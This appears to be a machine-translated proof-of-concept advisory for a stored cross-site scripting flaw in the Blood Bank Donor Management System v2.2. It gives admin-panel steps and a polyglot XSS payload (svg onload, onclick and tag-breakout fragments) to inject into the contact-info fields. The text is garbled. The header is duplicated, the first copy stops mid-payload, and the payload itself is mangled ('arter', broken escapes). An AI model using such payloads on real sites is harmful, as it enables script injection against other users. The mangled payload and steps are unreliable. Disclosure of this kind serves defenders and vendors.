#利用标题:血库捐助者管理系统使用v2.2-存储的XSS
#Application:献血者管理系统
#版本: v2.2
#BUGS:存储XSS
#Technology: PHP
#供应商homepage: https://phpgurukul.com/
#软件链接: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
#日期: 12.09.2023
#作者: Sospiro
#在: Windows上测试
#poc
====================================================
1。登录管理帐户
2。转到/admin/update-contactinfo.php
3。更改“ adress”或“电子邮件ID”或“联系电话”输入,然后添加'/* - /
4。转到http://bbdms.local/INEDX.PHP页面和XSS。
#Application:献血者管理系统
#版本: v2.2
#BUGS:存储XSS
#Technology: PHP
#供应商homepage: https://phpgurukul.com/
#软件链接: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
#日期: 12.09.2023
#作者: Sospiro
#在: Windows上测试
#poc
====================================================
1。登录管理帐户
2。转到/admin/update-contactinfo.php
3。更改“ adress”或“电子邮件ID”或“联系电话”输入,然后添加'/* - /
/*/\`/'/'////(/*/onclick=arter('1') )//%0D%0A%0D%0a //style //titcharea //script/- !\ x3csvg/svg/onload=arter()//\ x3e'有效载荷。4。转到http://bbdms.local/INEDX.PHP页面和XSS。